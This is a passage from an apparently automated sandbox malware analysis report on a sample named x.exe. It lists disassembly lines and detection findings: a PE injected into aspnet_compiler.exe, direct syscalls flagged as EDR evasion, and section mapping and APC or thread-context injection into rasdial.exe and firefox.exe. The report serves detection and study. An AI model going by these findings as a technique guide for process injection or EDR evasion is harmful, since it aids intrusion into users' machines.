            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AF096E mov eax, dword ptr fs:[00000030h]3_2_01AF096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B54978 mov eax, dword ptr fs:[00000030h]3_2_01B54978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B54978 mov eax, dword ptr fs:[00000030h]3_2_01B54978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD6962 mov eax, dword ptr fs:[00000030h]3_2_01AD6962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD6962 mov eax, dword ptr fs:[00000030h]3_2_01AD6962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD6962 mov eax, dword ptr fs:[00000030h]3_2_01AD6962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3C97C mov eax, dword ptr fs:[00000030h]3_2_01B3C97C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B30946 mov eax, dword ptr fs:[00000030h]3_2_01B30946
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B84940 mov eax, dword ptr fs:[00000030h]3_2_01B84940
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB0887 mov eax, dword ptr fs:[00000030h]3_2_01AB0887
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3C89D mov eax, dword ptr fs:[00000030h]3_2_01B3C89D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7A8E4 mov eax, dword ptr fs:[00000030h]3_2_01B7A8E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEC8F9 mov eax, dword ptr fs:[00000030h]3_2_01AEC8F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEC8F9 mov eax, dword ptr fs:[00000030h]3_2_01AEC8F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADE8C0 mov eax, dword ptr fs:[00000030h]3_2_01ADE8C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B808C0 mov eax, dword ptr fs:[00000030h]3_2_01B808C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5483A mov eax, dword ptr fs:[00000030h]3_2_01B5483A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5483A mov eax, dword ptr fs:[00000030h]3_2_01B5483A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD2835 mov eax, dword ptr fs:[00000030h]3_2_01AD2835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD2835 mov eax, dword ptr fs:[00000030h]3_2_01AD2835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD2835 mov eax, dword ptr fs:[00000030h]3_2_01AD2835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD2835 mov ecx, dword ptr fs:[00000030h]3_2_01AD2835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD2835 mov eax, dword ptr fs:[00000030h]3_2_01AD2835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD2835 mov eax, dword ptr fs:[00000030h]3_2_01AD2835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEA830 mov eax, dword ptr fs:[00000030h]3_2_01AEA830
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3C810 mov eax, dword ptr fs:[00000030h]3_2_01B3C810
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3E872 mov eax, dword ptr fs:[00000030h]3_2_01B3E872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3E872 mov eax, dword ptr fs:[00000030h]3_2_01B3E872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B46870 mov eax, dword ptr fs:[00000030h]3_2_01B46870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B46870 mov eax, dword ptr fs:[00000030h]3_2_01B46870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC2840 mov ecx, dword ptr fs:[00000030h]3_2_01AC2840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB4859 mov eax, dword ptr fs:[00000030h]3_2_01AB4859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB4859 mov eax, dword ptr fs:[00000030h]3_2_01AB4859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE0854 mov eax, dword ptr fs:[00000030h]3_2_01AE0854
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B64BB0 mov eax, dword ptr fs:[00000030h]3_2_01B64BB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B64BB0 mov eax, dword ptr fs:[00000030h]3_2_01B64BB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0BBE mov eax, dword ptr fs:[00000030h]3_2_01AC0BBE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AC0BBE mov eax, dword ptr fs:[00000030h]3_2_01AC0BBE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3CBF0 mov eax, dword ptr fs:[00000030h]3_2_01B3CBF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADEBFC mov eax, dword ptr fs:[00000030h]3_2_01ADEBFC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB8BF0 mov eax, dword ptr fs:[00000030h]3_2_01AB8BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB8BF0 mov eax, dword ptr fs:[00000030h]3_2_01AB8BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB8BF0 mov eax, dword ptr fs:[00000030h]3_2_01AB8BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5EBD0 mov eax, dword ptr fs:[00000030h]3_2_01B5EBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB0BCD mov eax, dword ptr fs:[00000030h]3_2_01AB0BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB0BCD mov eax, dword ptr fs:[00000030h]3_2_01AB0BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB0BCD mov eax, dword ptr fs:[00000030h]3_2_01AB0BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD0BCB mov eax, dword ptr fs:[00000030h]3_2_01AD0BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD0BCB mov eax, dword ptr fs:[00000030h]3_2_01AD0BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD0BCB mov eax, dword ptr fs:[00000030h]3_2_01AD0BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADEB20 mov eax, dword ptr fs:[00000030h]3_2_01ADEB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADEB20 mov eax, dword ptr fs:[00000030h]3_2_01ADEB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B78B28 mov eax, dword ptr fs:[00000030h]3_2_01B78B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B78B28 mov eax, dword ptr fs:[00000030h]3_2_01B78B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]3_2_01B2EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]3_2_01B2EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]3_2_01B2EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]3_2_01B2EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]3_2_01B2EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]3_2_01B2EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]3_2_01B2EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]3_2_01B2EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2EB1D mov eax, dword ptr fs:[00000030h]3_2_01B2EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B84B00 mov eax, dword ptr fs:[00000030h]3_2_01B84B00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AACB7E mov eax, dword ptr fs:[00000030h]3_2_01AACB7E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B5EB50 mov eax, dword ptr fs:[00000030h]3_2_01B5EB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B82B57 mov eax, dword ptr fs:[00000030h]3_2_01B82B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B82B57 mov eax, dword ptr fs:[00000030h]3_2_01B82B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B82B57 mov eax, dword ptr fs:[00000030h]3_2_01B82B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B82B57 mov eax, dword ptr fs:[00000030h]3_2_01B82B57
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B46B40 mov eax, dword ptr fs:[00000030h]3_2_01B46B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B46B40 mov eax, dword ptr fs:[00000030h]3_2_01B46B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B7AB40 mov eax, dword ptr fs:[00000030h]3_2_01B7AB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B58B42 mov eax, dword ptr fs:[00000030h]3_2_01B58B42
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AA8B50 mov eax, dword ptr fs:[00000030h]3_2_01AA8B50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B64B4B mov eax, dword ptr fs:[00000030h]3_2_01B64B4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B64B4B mov eax, dword ptr fs:[00000030h]3_2_01B64B4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB8AA0 mov eax, dword ptr fs:[00000030h]3_2_01AB8AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB8AA0 mov eax, dword ptr fs:[00000030h]3_2_01AB8AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B06AA4 mov eax, dword ptr fs:[00000030h]3_2_01B06AA4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]3_2_01ABEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]3_2_01ABEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]3_2_01ABEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]3_2_01ABEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]3_2_01ABEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]3_2_01ABEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]3_2_01ABEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]3_2_01ABEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ABEA80 mov eax, dword ptr fs:[00000030h]3_2_01ABEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B84A80 mov eax, dword ptr fs:[00000030h]3_2_01B84A80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE8A90 mov edx, dword ptr fs:[00000030h]3_2_01AE8A90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEAAEE mov eax, dword ptr fs:[00000030h]3_2_01AEAAEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AEAAEE mov eax, dword ptr fs:[00000030h]3_2_01AEAAEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AB0AD0 mov eax, dword ptr fs:[00000030h]3_2_01AB0AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B06ACC mov eax, dword ptr fs:[00000030h]3_2_01B06ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B06ACC mov eax, dword ptr fs:[00000030h]3_2_01B06ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B06ACC mov eax, dword ptr fs:[00000030h]3_2_01B06ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE4AD0 mov eax, dword ptr fs:[00000030h]3_2_01AE4AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AE4AD0 mov eax, dword ptr fs:[00000030h]3_2_01AE4AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01ADEA2E mov eax, dword ptr fs:[00000030h]3_2_01ADEA2E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AECA24 mov eax, dword ptr fs:[00000030h]3_2_01AECA24
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AECA38 mov eax, dword ptr fs:[00000030h]3_2_01AECA38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD4A35 mov eax, dword ptr fs:[00000030h]3_2_01AD4A35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AD4A35 mov eax, dword ptr fs:[00000030h]3_2_01AD4A35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B3CA11 mov eax, dword ptr fs:[00000030h]3_2_01B3CA11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2CA72 mov eax, dword ptr fs:[00000030h]3_2_01B2CA72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01B2CA72 mov eax, dword ptr fs:[00000030h]3_2_01B2CA72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AECA6F mov eax, dword ptr fs:[00000030h]3_2_01AECA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 3_2_01AECA6F mov eax, dword ptr fs:[00000030h]3_2_01AECA6F
            Source: C:\Users\user\Desktop\x.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\x.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\x.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtProtectVirtualMemory: Direct from: 0x77457B2EJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtClose: Direct from: 0x77462B6C
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtAllocateVirtualMemory: Direct from: 0x774648ECJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtQuerySystemInformation: Direct from: 0x774648CCJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtQueryVolumeInformationFile: Direct from: 0x77462F2CJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtReadVirtualMemory: Direct from: 0x77462E8CJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtCreateKey: Direct from: 0x77462C6CJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtSetInformationThread: Direct from: 0x77462B4CJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtQueryAttributesFile: Direct from: 0x77462E6CJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtDeviceIoControlFile: Direct from: 0x77462AECJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtOpenSection: Direct from: 0x77462E0CJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtCreateFile: Direct from: 0x77462FECJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtOpenFile: Direct from: 0x77462DCCJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtSetInformationThread: Direct from: 0x77462ECCJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtQueryInformationToken: Direct from: 0x77462CACJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtTerminateThread: Direct from: 0x77462FCCJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtAllocateVirtualMemory: Direct from: 0x77462BECJump to behavior
            Source: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeNtOpenKeyEx: Direct from: 0x77462B9CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\x.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\rasdial.exeThread register set: target process: 5200Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\rasdial.exeThread APC queued: target process: C:\Program Files (x86)\zYBBHksdFwcWUhwhQaahzUvTDYOhVVXVrysonDeezwInLiDObpMLTHHIzjObvxRrWBxf\crUcuBAsmdG.exeJump to behavior
            Writes to foreign memory regions
